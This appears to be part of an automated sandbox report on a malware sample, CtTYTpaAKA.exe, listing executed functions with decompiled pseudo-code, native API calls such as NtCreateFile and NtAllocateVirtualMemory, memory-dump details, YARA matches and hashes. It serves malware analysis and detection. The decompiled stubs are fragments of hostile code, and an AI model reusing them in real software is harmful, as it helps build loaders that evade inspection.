                                              • Instruction Fuzzy Hash: 4B21E3B5D00248AFDB10CFA9D884ADEFBF8EF48324F14841AE954A3310D774A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02849588, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02849B71,00000800,00000000,00000000), ref: 02849D82
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 755ae7b7169c390c2bbac4a3f0f7b75c3e3eee121791fbe4b96d049511b27e2d
                                              • Instruction ID: 57b2407d6d355e055dd4fd416461623f90eedd65ed432829bd288ef3f7cf0bb1
                                              • Opcode Fuzzy Hash: 755ae7b7169c390c2bbac4a3f0f7b75c3e3eee121791fbe4b96d049511b27e2d
                                              • Instruction Fuzzy Hash: 4F11D3BAD002499FDB20CF9AC444BDEFBF8EF48714F14842AE559A7200C774A945CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02849D11, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02849B71,00000800,00000000,00000000), ref: 02849D82
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: c3f89f614f7a77d0910f770ad52b3e3aee0d64b2831e9c4fd1e07d28cd6b4f59
                                              • Instruction ID: 0cb135301d49b3c09af381f330c858c233497a542e0482d18513b25b6c4ec2a8
                                              • Opcode Fuzzy Hash: c3f89f614f7a77d0910f770ad52b3e3aee0d64b2831e9c4fd1e07d28cd6b4f59
                                              • Instruction Fuzzy Hash: 2411E7B6D002499FDB20CF9AD844BDEFBF4EF48724F14852AD469A7240C774A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02849A90, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02849AF6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: be42b023de33df32d70671a59e6c11d3439a242dade2c77800126a15c352ee84
                                              • Instruction ID: 2436a495e6738e574a23e362b4106ff7064f7fc1beec97f6cdf7d3b924d944c9
                                              • Opcode Fuzzy Hash: be42b023de33df32d70671a59e6c11d3439a242dade2c77800126a15c352ee84
                                              • Instruction Fuzzy Hash: 491102B9D002498FCB20CF9AC444BDEFBF4AF48224F14842AD419B7200C774A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 0284CC5C, Relevance: .3, Instructions: 265COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8cbf230deee27c49653f09e968e93e011dfc678d86385551fafbfa4b4e705346
                                              • Instruction ID: 954d8cf01b10e6678c89ffeef2d50036c45596d374e76f19c130ae859266f15f
                                              • Opcode Fuzzy Hash: 8cbf230deee27c49653f09e968e93e011dfc678d86385551fafbfa4b4e705346
                                              • Instruction Fuzzy Hash: FDA14C3AE002198FCF15DFA5C844A9EBBB7FF85304B15856AE805EB261EF31A915CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: CtTYTpaAKA.exe PID: 5784 Parent PID: 7140 CtTYTpaAKA.exeCOMMON

                                              Executed Functions

                                              Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}






                                              0x004186a3
                                              0x004186af
                                              0x004186b7
                                              0x004186bc
                                              0x004186e5
                                              0x004186e9

                                              APIs
                                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: A:A
                                              • API String ID: 2738559852-2859176346
                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041871A, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 50%
                                              			E0041871A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("repne daa");
				asm("in al, dx");
				asm("popad");
				asm("loope 0x35");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                              0x0041871a
                                              0x0041871c
                                              0x0041871d
                                              0x0041871e
                                              0x00418723
                                              0x00418726
                                              0x0041872f
                                              0x00418737
                                              0x00418745
                                              0x00418749

                                              APIs
                                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                              • Instruction ID: 9a256857486c6b04dc2d8d01bbab50f47954425687f1d86c7330f0437a7ebe71
                                              • Opcode Fuzzy Hash: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                              • Instruction Fuzzy Hash: E5014876200208BBDB14DF99CC85EEB77A9EF88314F118559BA18AB242C630E9548BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00409B50(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;

				_t32 = __esi;
				_t31 = __edi;
				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t34 = _t33 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(__eflags, _v8);
					_t35 = _t34 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620(__ebx,  &_v12, 0);
						_t35 = _t35 + 8;
					}
					_t18 = E00419730(_t31, _t32, _v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}















                                              0x00409b50
                                              0x00409b50
                                              0x00409b6c
                                              0x00409b6f
                                              0x00409b74
                                              0x00409b79
                                              0x00409b83
                                              0x00409b88
                                              0x00409b8b
                                              0x00409b8d
                                              0x00409b95
                                              0x00409b9a
                                              0x00409b9a
                                              0x00409ba1
                                              0x00409ba9
                                              0x00409bac
                                              0x00409bae
                                              0x00409bc2
                                              0x00000000
                                              0x00409bc4
                                              0x00409bca
                                              0x00409b7e
                                              0x00409b7e
                                              0x00409b7e

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004185EB, Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004185EB(void* __eax, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v117;
				long _t27;
				void* _t38;

				_t21 = _a4;
				_t6 = _t21 + 0xc40; // 0xc40
				E004191F0(_t38, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t27 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t27;
			}






                                              0x004185f3
                                              0x004185ff
                                              0x00418607
                                              0x0041863d
                                              0x00418641

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                              • Instruction ID: eadccef6660383827a1c39e062733e9e7291f8de244501940662f3f68da9609a
                                              • Opcode Fuzzy Hash: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                              • Instruction Fuzzy Hash: B501AFB2245108AFCB08CF99DC95EEB77A9AF8C354F158248FA1D97241D630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                              0x004185ff
                                              0x00418607
                                              0x0041863d
                                              0x00418641

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004187CA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004187CA(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t17;
				void* _t28;

				_t13 = _a4;
				_t4 = _t13 + 0xc60; // 0xca0
				E004191F0(_t28, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}





                                              0x004187d3
                                              0x004187df
                                              0x004187e7
                                              0x00418809
                                              0x0041880d

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                              • Instruction ID: baafc16d0dcc65a97a2a7081ec653fa0cdbc2bd5867fea8e6554ff1b4ee91aef
                                              • Opcode Fuzzy Hash: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                              • Instruction Fuzzy Hash: B9F08CB2200108AFDB14DF88CC80EEB73ACFF88304F108149FE4997241C630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                              0x004187df
                                              0x004187e7
                                              0x00418809
                                              0x0041880d

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                              0x00418723
                                              0x00418726
                                              0x0041872f
                                              0x00418737
                                              0x00418745
                                              0x00418749

                                              APIs
                                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 00a18a06596ad4b476a2ef211873c1c3d2092edfa43c356fa3f16d3c8c0ab8fd
                                              • Instruction ID: 1f66aa348b942f1543d33f74b6675086b27df1da0c3e8cc2a9ac19bafc2c9233
                                              • Opcode Fuzzy Hash: 00a18a06596ad4b476a2ef211873c1c3d2092edfa43c356fa3f16d3c8c0ab8fd
                                              • Instruction Fuzzy Hash: AE90026160100902D20171594404626100B9BD0381F92C032A2015556FCA658992F171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 469f09d02871ff23d8d3fb3861419080370543fdb5da11965874d7b75191da8d
                                              • Instruction ID: e13c9f4c3f3591679f70e1bc5d393f13bc1487c8d840833ea98833aea70d8273
                                              • Opcode Fuzzy Hash: 469f09d02871ff23d8d3fb3861419080370543fdb5da11965874d7b75191da8d
                                              • Instruction Fuzzy Hash: 5E90027120100813D21161594504717100A9BD0381F92C422A1415559E96968952F161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3b05dfb0c86dddef202d0652aa1964822d066e20d16934e423689131928e5e29
                                              • Instruction ID: d5dad89dd970f4b1df63fd1e16f416388f30dba2f7063050d8a1dc5e85f7957c
                                              • Opcode Fuzzy Hash: 3b05dfb0c86dddef202d0652aa1964822d066e20d16934e423689131928e5e29
                                              • Instruction Fuzzy Hash: 6E900261242045525645B15944045175007ABE0381792C022A2405951D85669856F661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 783ec9b52578cffa0e388dc044eb4073357bba82f5325862019c3789f9cea9dc
                                              • Instruction ID: d301415a7278175c444edfd67515c8a516b55754e09b31bbc965b00936c4f65a
                                              • Opcode Fuzzy Hash: 783ec9b52578cffa0e388dc044eb4073357bba82f5325862019c3789f9cea9dc
                                              • Instruction Fuzzy Hash: 129002A120200403420571594414626500B9BE0341B52C031E2005591EC5658891B165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 433bdfa9ac4682e1a5f4fed5306f505abbf1ae216d7634071aec7f06c53296d7
                                              • Instruction ID: 407a2508857720803f5503cf4f29efa6ac1a96e484fee0b330fbbf414f3a82cb
                                              • Opcode Fuzzy Hash: 433bdfa9ac4682e1a5f4fed5306f505abbf1ae216d7634071aec7f06c53296d7
                                              • Instruction Fuzzy Hash: 939002A134100842D20061594414B161006DBE1341F52C025E2055555E8659CC52B166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 226f90f8aefedb5a0cae8c24f24c403566f5af5d5b0342ee4acfec0b5f23fb35
                                              • Instruction ID: 69162ed29e56e68af7b2978969ee0204f9d764519973f2f8ea5eedbe19cc768b
                                              • Opcode Fuzzy Hash: 226f90f8aefedb5a0cae8c24f24c403566f5af5d5b0342ee4acfec0b5f23fb35
                                              • Instruction Fuzzy Hash: 72900265211004030205A559070451710479BD5391352C031F2006551DD6618861B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1e8f9e34e7256a9a974f3cddaf0f3ebbf235d585145650c4dda65b06d2cc7b00
                                              • Instruction ID: 7b611f7d2db9be6b796d577088613073eb51052201da35903ce31f64545808ae
                                              • Opcode Fuzzy Hash: 1e8f9e34e7256a9a974f3cddaf0f3ebbf235d585145650c4dda65b06d2cc7b00
                                              • Instruction Fuzzy Hash: 4B9002B120100802D2407159440475610069BD0341F52C021A6055555F86998DD5B6A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8dd3192fce5394c09b44779953a602328edc70c990b717f215e4932cca1f73ff
                                              • Instruction ID: c58cb0ec6eb548e2473b038ea265bd80684ee20eb5de19b67b3e630d8de64cc4
                                              • Opcode Fuzzy Hash: 8dd3192fce5394c09b44779953a602328edc70c990b717f215e4932cca1f73ff
                                              • Instruction Fuzzy Hash: 3590027120108C02D2106159840475A10069BD0341F56C421A5415659E86D58891B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 11f0bf54a6029bc631af4d460e26a135bda53ad9e4211d8e8688064be5d502a9
                                              • Instruction ID: f662abfc5e1220b3c0917192af0d623bbfe401405b8021a2b4bf2bca61f27f6c
                                              • Opcode Fuzzy Hash: 11f0bf54a6029bc631af4d460e26a135bda53ad9e4211d8e8688064be5d502a9
                                              • Instruction Fuzzy Hash: 9090027120100C02D2807159440465A10069BD1341F92C025A1016655ECA558A59B7E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 869d5e6d09cd8a5b408c42e5df911b350a08f1b9c7913d025a83192ed36242ba
                                              • Instruction ID: 9c44c9066dc5755a967dddd771e37cdab22114344506291eca3a738d0691b94b
                                              • Opcode Fuzzy Hash: 869d5e6d09cd8a5b408c42e5df911b350a08f1b9c7913d025a83192ed36242ba
                                              • Instruction Fuzzy Hash: 1990026121180442D30065694C14B1710069BD0343F52C125A1145555DC9558861B561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 78dc3d6e53dfd09d18f0d351c3e50b0e1df2cf7a5f4ba5c50c851e6bdb36225a
                                              • Instruction ID: 51ee488a3e20044e3fa6ddcc2a087237d3d02dbfcc1035311a8e34ff663592d5
                                              • Opcode Fuzzy Hash: 78dc3d6e53dfd09d18f0d351c3e50b0e1df2cf7a5f4ba5c50c851e6bdb36225a
                                              • Instruction Fuzzy Hash: 36900261601004424240716988449165006BFE1351752C131A1989551E85998865B6A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f868270fd422e5fa2ad32053628b44a92dac86e885c2cfde5cb8305350acea7b
                                              • Instruction ID: 26dd0ea29e7b78e4bd277c39c79de5c2b9ff6581b8807e68f0f1dfc835ce02c2
                                              • Opcode Fuzzy Hash: f868270fd422e5fa2ad32053628b44a92dac86e885c2cfde5cb8305350acea7b
                                              • Instruction Fuzzy Hash: A190027120140802D2006159481471B10069BD0342F52C021A2155556E86658851B5B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d72a47be40b7aaf149c044fd95bc5e4c174f4e8df4b4948f1333c2827b5733b6
                                              • Instruction ID: b7637a93b9a1a1451a80c9c8bf8054f0f05f3389d4e7cde5ceeb83d929595390
                                              • Opcode Fuzzy Hash: d72a47be40b7aaf149c044fd95bc5e4c174f4e8df4b4948f1333c2827b5733b6
